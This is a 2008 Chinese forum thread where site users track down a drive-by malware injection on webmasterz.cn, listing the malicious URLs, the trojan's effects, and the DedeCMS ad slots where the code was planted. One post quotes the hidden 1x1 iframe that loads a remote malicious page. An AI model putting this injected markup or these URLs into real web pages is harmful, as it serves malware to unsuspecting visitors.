webmasterz.cn上的掛馬掛在哪了我怎麼查了半天查不到？

顯示全部樓層 · 發表於 2008-1-10 16:50:35

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
http://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
這兩個是免殺的，還有幾個沒記下來，
這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

顯示全部樓層 · 發表於 2008-1-10 17:01:37

會在C盤下產生 CRESS1.EXE
然後增加IE的BHO的木馬還釋放驅動

顯示全部樓層 · 發表於 2008-1-10 17:34:02

昏他藏得好隱秘找到了放毒得地方了

iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然後再這個地址轉到ppp.749571.co m/dm/test.htm
為了跟蹤這個病毒自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

顯示全部樓層 · 發表於 2008-1-10 18:00:24

原帖由 20082008 於 2008-1-9 16:33 發表 7 \7 ^+ ?. z- o |
沒裝REAL就沒事，好在我重新裝的系統:

說的沒錯

顯示全部樓層 · 發表於 2008-1-11 02:27:32

原帖由 freelzyr 於 2008-1-10 16:47 發表 7 A" t4 T, ~8 f; c3 q0 S
進dede後台 ' W* \5 s$ m8 a, U- B/ D
檢查 ad_js.php?aid=1  . s" w5 d& d. G$ j
ad_js.php?aid=2
. H' w  \+ C# had_js.php?aid=3 / D2 A; m3 _7 B- R
ad_js.php?aid=4) G( T  \; }. i, D
. K( [+ R, i% O
這幾個廣告裡面的代碼5 R+ o3 R2 ^+ {5 n8 m/ [& m
在這幾個掉茅廁位裡面含有木馬的代碼

這個檢查了沒有的

顯示全部樓層 · 發表於 2008-1-11 09:09:11

原帖由 靜水流深 於 2008-1-11 02:27 發表
, ?) W& Q* `9 \
& `& q/ g; ^! v& v5 K" @ s; h. u$ [# C6 u4 q
這個檢查了沒有的

我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

顯示全部樓層 · 發表於 2008-1-11 12:44:57

原帖由 靜水流深 於 2008-1-11 02:27 發表 * D! t5 n8 ?$ H0 k% M4 E
2 a/ m* \( |7 a3 _1 t @
& _$ H+ ^3 P& E8 Y
這個檢查了沒有的

木馬就是在這裡裡啊
在後台的掉茅廁位設置那
裡

顯示全部樓層 · 發表於 2008-1-30 10:38:22

現在明瞭.
有人收流量做ppp.749571.co m的..
最近被掛馬的話. 都改成js了. 不用iframe了

顯示全部樓層 · 發表於 2008-1-30 11:53:15

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景

		自動登錄	找回密碼
密碼			免费注册

webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

webmasterz.cn上的掛馬掛在哪了我怎麼查了半天查不到？